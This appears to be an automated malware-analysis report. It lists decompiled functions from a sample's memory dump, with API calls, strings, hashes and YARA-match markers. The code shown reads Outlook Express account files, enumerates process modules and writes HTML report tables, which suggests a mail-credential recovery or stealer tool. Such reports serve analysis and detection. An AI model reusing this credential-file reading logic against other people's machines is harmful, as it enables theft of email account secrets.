                                                  • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                  • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E906, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 25%
                                                  			E0040E906(void* __ebx, int _a4, void* _a8) {
				char _v20;
				char _v36;
				char _v52;
				void* _t15;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				int _t32;

				_t28 = __ebx;
				_t31 = __imp__UuidFromStringA;
				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
					return 0;
				} else {
					_t32 = _a4;
					if(_t32 > 0x7e) {
						_t32 = 0x7e;
					}
					memcpy(_t28, _a8, _t32);
					 *((char*)(_t28 + _t32)) = 0;
					__imp__CoTaskMemFree(_a8);
					return 1;
				}
			}











                                                  0x0040e906
                                                  0x0040e90d
                                                  0x0040e91d
                                                  0x0040e92a
                                                  0x0040e92e
                                                  0x00000000
                                                  0x0040e956
                                                  0x0040e956
                                                  0x0040e95c
                                                  0x0040e960
                                                  0x0040e960
                                                  0x0040e966
                                                  0x0040e971
                                                  0x0040e975
                                                  0x00000000
                                                  0x0040e97d

                                                  APIs
                                                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                  • memcpy.MSVCRT ref: 0040E966
                                                  • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                  Strings
                                                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                  • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                  • API String ID: 1640410171-3316789007
                                                  • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                  • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                  • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                  • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410BC7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E00410BC7(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t12;
				void* _t15;
				char* _t19;
				void* _t25;
				void* _t28;
				long _t31;

				_t12 = E00405ECB(_a8);
				_a8 = _t12;
				if(_t12 != 0xffffffff) {
					_t31 = GetFileSize(_t12, 0);
					_t37 = _t31 - 2;
					if(_t31 > 2) {
						_t3 = _t31 + 2; // 0x2
						_t15 = _t3;
						L004115D0();
						_t25 = _t15;
						_t28 = _t15;
						SetFilePointer(_a8, 2, 0, 0);
						_t5 = _t31 - 2; // -2
						E004066F6(_t25, _a8, _t28, _t5);
						_t19 = _t28 + _t31;
						 *((char*)(_t19 - 2)) = 0;
						 *((char*)(_t19 - 1)) = 0;
						 *_t19 = 0;
						E00410A8A(_t25, _t37, _a4, _t28);
						_push(_t28);
						L004115D6();
					}
					return CloseHandle(_a8);
				}
				return _t12;
			}









                                                  0x00410bcd
                                                  0x00410bd6
                                                  0x00410bd9
                                                  0x00410be7
                                                  0x00410be9
                                                  0x00410bec
                                                  0x00410bee
                                                  0x00410bee
                                                  0x00410bf3
                                                  0x00410bf8
                                                  0x00410c00
                                                  0x00410c02
                                                  0x00410c08
                                                  0x00410c10
                                                  0x00410c18
                                                  0x00410c1f
                                                  0x00410c22
                                                  0x00410c25
                                                  0x00410c27
                                                  0x00410c2c
                                                  0x00410c2d
                                                  0x00410c33
                                                  0x00000000
                                                  0x00410c3e
                                                  0x00410c40

                                                  APIs
                                                    • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00410BF3
                                                  • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02
                                                    • Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D
                                                    • Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
                                                    • Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                    • Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                    • Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
                                                    • Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
                                                    • Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00410C2D
                                                  • CloseHandle.KERNEL32(?), ref: 00410C37
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                  • String ID: rA
                                                  • API String ID: 1886237854-474049127
                                                  • Opcode ID: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                  • Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
                                                  • Opcode Fuzzy Hash: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                  • Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409E32, Relevance: 10.5, APIs: 7, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				 *__edi =  *__edi + __ecx;
			}



                                                  0x00409e38

                                                  APIs
                                                    • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                    • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                  • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                  • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                  • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                  • String ID:
                                                  • API String ID: 3673709545-0
                                                  • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                  • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                  • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                  • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409E33, Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
			}



                                                  0x00409e38

                                                  APIs
                                                    • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                    • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                  • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                  • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                  • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                  • String ID:
                                                  • API String ID: 3673709545-0
                                                  • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                  • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                  • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                  • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407D0A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E00407D0A(void* __eflags, struct HWND__* _a4) {
				void _v4103;
				char _v4104;
				void* _t8;
				void* _t17;

				_t8 = E004118A0(0x1004, _t17);
				_t21 =  *0x4171b8;
				if( *0x4171b8 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					sprintf(0x4172c0, "dialog_%d",  *0x417300);
					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00407CAD, 0);
				}
				return _t8;
			}







                                                  0x00407d12
                                                  0x00407d17
                                                  0x00407d1e
                                                  0x00407d2e
                                                  0x00407d35
                                                  0x00407d4a
                                                  0x00407d65
                                                  0x00407d71
                                                  0x00407d71
                                                  0x00000000
                                                  0x00407d81
                                                  0x00407d88

                                                  APIs
                                                  • memset.MSVCRT ref: 00407D35
                                                  • sprintf.MSVCRT ref: 00407D4A
                                                    • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                    • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                    • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                  • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                  • EnumChildWindows.USER32 ref: 00407D81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                  • String ID: caption$dialog_%d
                                                  • API String ID: 246480800-4161923789
                                                  • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                  • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                  • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                  • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E255, Relevance: 9.1, APIs: 6, Instructions: 142stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 35%
                                                  			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				unsigned int _v16;
				int _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v308;
				intOrPtr _v312;
				void _v316;
				void _v579;
				char _v580;
				char _v844;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char _v1132;
				char _v17516;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t64;
				void* _t77;
				intOrPtr _t84;
				void _t94;
				int _t102;
				void* _t106;
				void* _t107;

				E004118A0(0x446c, __ecx);
				_t102 = 0;
				_v20 = 0;
				if(E0040629C() == 0 ||  *0x417518 == 0) {
					if( *0x417514 != _t102) {
						_t94 = _a4;
						_t63 =  *0x416fe0(8, _t94);
						_v8 = _t63;
						if(_t63 != 0xffffffff) {
							_v20 = 1;
							_v1132 = 0x224;
							_t64 =  *0x416fd8(_t63,  &_v1132);
							while(_t64 != 0) {
								memset( &_v316, _t102, 0x118);
								_v312 = _v1104;
								_v316 = _t94;
								strcpy( &_v308,  &_v844);
								_v44 = _v1108;
								_t107 = _t107 + 0x14;
								_v40 = _v1112;
								_v1132 = 0x224;
								if(E0040E45F(_a8,  &_v316) != 0) {
									_t64 =  *0x416fd4(_v8,  &_v1132);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t77 = OpenProcess(0x410, 0, _a4);
					_v8 = _t77;
					if(_t77 != 0) {
						_push( &_v16);
						_push(0x4000);
						_push( &_v17516);
						_push(_t77);
						if( *0x416fe4() != 0) {
							_t6 =  &_v16;
							 *_t6 = _v16 >> 2;
							_v20 = 1;
							_v12 = 0;
							if( *_t6 != 0) {
								while(1) {
									_v580 = 0;
									memset( &_v579, _t102, 0x104);
									memset( &_v316, _t102, 0x118);
									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
									_t107 = _t107 + 0x18;
									_v316 = _a4;
									_v312 = _t84;
									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
									E0040E172( &_v308,  &_v580);
									_push(0xc);
									_push( &_v32);
									_push(_v312);
									_push(_v8);
									if( *0x416fe8() != 0) {
										_v44 = _v28;
										_v40 = _v32;
									}
									if(E0040E45F(_a8,  &_v316) == 0) {
										goto L18;
									}
									_v12 = _v12 + 1;
									if(_v12 < _v16) {
										_t102 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v8);
					}
				}
				return _v20;
			}
































                                                  0x0040e25d
                                                  0x0040e265
                                                  0x0040e267
                                                  0x0040e271
                                                  0x0040e395
                                                  0x0040e39b
                                                  0x0040e3a1
                                                  0x0040e3aa
                                                  0x0040e3ad
                                                  0x0040e3c0
                                                  0x0040e3c7
                                                  0x0040e3cd
                                                  0x0040e44a
                                                  0x0040e3e2
                                                  0x0040e3ed
                                                  0x0040e401
                                                  0x0040e407
                                                  0x0040e412
                                                  0x0040e41b
                                                  0x0040e41e
                                                  0x0040e42b
                                                  0x0040e438
                                                  0x0040e444
                                                  0x00000000
                                                  0x0040e444
                                                  0x00000000
                                                  0x0040e438
                                                  0x00000000
                                                  0x0040e44a
                                                  0x0040e3ad
                                                  0x0040e283
                                                  0x0040e28c
                                                  0x0040e294
                                                  0x0040e297
                                                  0x0040e2a0
                                                  0x0040e2a1
                                                  0x0040e2ac
                                                  0x0040e2ad
                                                  0x0040e2b6
                                                  0x0040e2bc
                                                  0x0040e2bc
                                                  0x0040e2c0
                                                  0x0040e2c7
                                                  0x0040e2ca
                                                  0x0040e2d9
                                                  0x0040e2e2
                                                  0x0040e2e9
                                                  0x0040e2fb
                                                  0x0040e306
                                                  0x0040e30d
                                                  0x0040e311
                                                  0x0040e322
                                                  0x0040e328
                                                  0x0040e33a
                                                  0x0040e33f
                                                  0x0040e344
                                                  0x0040e345
                                                  0x0040e34b
                                                  0x0040e356
                                                  0x0040e35b
                                                  0x0040e361
                                                  0x0040e361
                                                  0x0040e375
                                                  0x00000000
                                                  0x00000000
                                                  0x0040e37b
                                                  0x0040e384
                                                  0x0040e2d7
                                                  0x00000000
                                                  0x00000000
                                                  0x0040e38a
                                                  0x00000000
                                                  0x0040e384
                                                  0x0040e2d9
                                                  0x0040e2ca
                                                  0x0040e44e
                                                  0x0040e451
                                                  0x0040e451
                                                  0x0040e297
                                                  0x0040e45e

                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                  • memset.MSVCRT ref: 0040E2E9
                                                  • memset.MSVCRT ref: 0040E2FB
                                                    • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                  • memset.MSVCRT ref: 0040E3E2
                                                  • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                  • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$strcpy$CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 3799309942-0
                                                  • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                  • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                  • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                  • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409369, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 106stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 61%
                                                  			E00409369(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v68;
				void _v96;
				void* __edi;
				signed int _t51;
				char* _t53;
				char* _t63;
				intOrPtr* _t69;
				signed int _t70;
				char _t84;
				intOrPtr* _t91;
				signed int _t95;
				void* _t96;
				void* _t97;

				_t69 = __ebx;
				_t70 = 6;
				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
				_t97 = _t96 + 0xc;
				asm("movsw");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00405EFD(_a4, "<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
					do {
						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
						_v8 = _t51;
						_t53 =  &_v96;
						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
							_t53 =  &_v48;
						}
						_t91 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t53;
						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
						E0040F071(_v28,  &_v68);
						E0040F09D( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
						_t63 =  *(_t69 + 0x50);
						_t84 =  *_t63;
						if(_t84 == 0 || _t84 == 0x20) {
							strcat(_t63, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
						E00405EFD(_a4,  *(_t69 + 0x4c));
						_t97 = _t97 + 0x20;
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
				}
				return E00405EFD(_a4, 0x412b1c);
			}























                                                  0x00409369
                                                  0x00409373
                                                  0x0040937c
                                                  0x0040937c
                                                  0x0040937e
                                                  0x00409388
                                                  0x00409389
                                                  0x0040938a
                                                  0x0040938b
                                                  0x0040938c
                                                  0x00409396
                                                  0x00409397
                                                  0x0040939c
                                                  0x004093a3
                                                  0x004093a9
                                                  0x004093ac
                                                  0x004093b2
                                                  0x004093bd
                                                  0x004093c0
                                                  0x004093c2
                                                  0x004093c2
                                                  0x004093c5
                                                  0x004093c8
                                                  0x004093cc
                                                  0x004093d0
                                                  0x004093d4
                                                  0x004093de
                                                  0x004093e7
                                                  0x004093f1
                                                  0x00409407
                                                  0x00409417
                                                  0x0040941a
                                                  0x0040941d
                                                  0x00409421
                                                  0x0040942e
                                                  0x00409434
                                                  0x0040943e
                                                  0x00409450
                                                  0x0040945b
                                                  0x00409460
                                                  0x00409463
                                                  0x00409464
                                                  0x004093a9
                                                  0x0040947f

                                                  APIs
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                  • strcat.MSVCRT(?,&nbsp;), ref: 0040942E
                                                  • sprintf.MSVCRT ref: 00409450
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWritesprintfstrcatstrlen
                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                  • API String ID: 3813295786-4153097237
                                                  • Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                  • Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
                                                  • Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                  • Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410A8A, Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v288;
				intOrPtr _v800;
				char _v1568;
				char _v1824;
				intOrPtr _v1828;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v2100;
				intOrPtr _v2612;
				char _v3124;
				char _v3636;
				intOrPtr _v3640;
				void* _v5768;
				char _v5796;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t39;
				intOrPtr _t51;
				int _t60;
				intOrPtr* _t73;
				int _t76;
				void* _t80;

				_t80 = __eflags;
				E004118A0(0x16a0, __ecx);
				_t39 = wcslen(_a8);
				_t2 =  &(_t39[1]); // 0x1
				_t76 = _t2;
				_push(_t76);
				L004115D0();
				_t60 = 0;
				_v8 = _t39;
				 *_t39 = 0;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
				_t77 =  &_v5796;
				E0040FE05( &_v5796, _t80);
				_v5796 = 0x4144ac;
				E004104BC( &_v3636);
				E004104BC( &_v1824);
				_t73 = _a4;
				_v3640 =  *((intOrPtr*)(_t73 + 4));
				_v12 = _t73;
				_a8 = strlen(_v8);
				E0040FF76(_t47, _t77);
				memcpy(_v5768, _v8, _a8);
				E00410081(_t77, _t80);
				_t51 =  *((intOrPtr*)(_t73 + 4));
				_v1840 = _t51;
				_v28 = _t51;
				if(_v2100 != 0 || _v2612 != 0) {
					if(_v1844 != _t60) {
						if(_v1568 != _t60) {
							E004060D0(0xff,  &_v3124,  &_v1568);
							_t73 = _a4;
							_v1828 = _v24;
							_t60 = 0;
						}
						 *((intOrPtr*)( *_t73))( &_v3636);
					}
				}
				if(_v288 != _t60 || _v800 != _t60) {
					if(_v32 != _t60) {
						 *((intOrPtr*)( *_t73))( &_v1824);
					}
				}
				_push(_v8);
				L004115D6();
				return E0040FEED( &_v5796);
			}































                                                  0x00410a8a
                                                  0x00410a92
                                                  0x00410a9d
                                                  0x00410aa2
                                                  0x00410aa2
                                                  0x00410aa5
                                                  0x00410aa6
                                                  0x00410aad
                                                  0x00410ab8
                                                  0x00410abd
                                                  0x00410abf
                                                  0x00410ac5
                                                  0x00410acb
                                                  0x00410ad6
                                                  0x00410ae0
                                                  0x00410aeb
                                                  0x00410af0
                                                  0x00410af9
                                                  0x00410aff
                                                  0x00410b08
                                                  0x00410b0b
                                                  0x00410b1c
                                                  0x00410b26
                                                  0x00410b31
                                                  0x00410b34
                                                  0x00410b3a
                                                  0x00410b3d
                                                  0x00410b4d
                                                  0x00410b55
                                                  0x00410b69
                                                  0x00410b71
                                                  0x00410b75
                                                  0x00410b7b
                                                  0x00410b7b
                                                  0x00410b88
                                                  0x00410b88
                                                  0x00410b4d
                                                  0x00410b90
                                                  0x00410b9d
                                                  0x00410baa
                                                  0x00410baa
                                                  0x00410b9d
                                                  0x00410bac
                                                  0x00410baf
                                                  0x00410bc4

                                                  APIs
                                                  • wcslen.MSVCRT ref: 00410A9D
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                    • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                    • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                    • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                    • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                    • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                  • strlen.MSVCRT ref: 00410B02
                                                    • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                    • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                  • memcpy.MSVCRT ref: 00410B1C
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                  • String ID:
                                                  • API String ID: 577244452-0
                                                  • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                  • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                  • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                  • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
